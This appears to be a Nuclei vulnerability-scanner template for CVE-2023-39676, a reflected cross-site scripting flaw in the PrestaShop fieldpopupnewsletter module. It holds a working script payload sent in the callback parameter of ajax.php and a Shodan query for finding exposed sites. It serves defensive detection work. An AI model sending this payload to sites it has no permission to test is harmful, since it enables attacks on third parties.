49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2023-39676
|
|
|
|
info:
|
|
name: PrestaShop fieldpopupnewsletter Module - Cross Site Scripting
|
|
author: meme-lord
|
|
severity: medium
|
|
description: |
|
|
Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential theft of sensitive information, session hijacking, or defacement.
|
|
reference:
|
|
- https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
|
|
- https://sorcery.ie
|
|
- https://themeforest.net/user/fieldthemes
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-39676
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00167
|
|
epss-percentile: 0.53357
|
|
cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: fieldthemes
|
|
product: fieldpopupnewsletter
|
|
framework: prestashop
|
|
shodan-query: html:"fieldpopupnewsletter"
|
|
tags: cve,cve2023,prestashop,xss,fieldthemes
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>"
|
|
- "Invalid email"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402203c6553397a0cdf3815e10bb68d28fea3bdc47c3c1db8337d8b8c742fc5202001022060d09037226ffc2d83f8f3e96a761452785cc264384c22bdb0a93176301e0eda:922c64590222798bb761d5b6d8e72950 |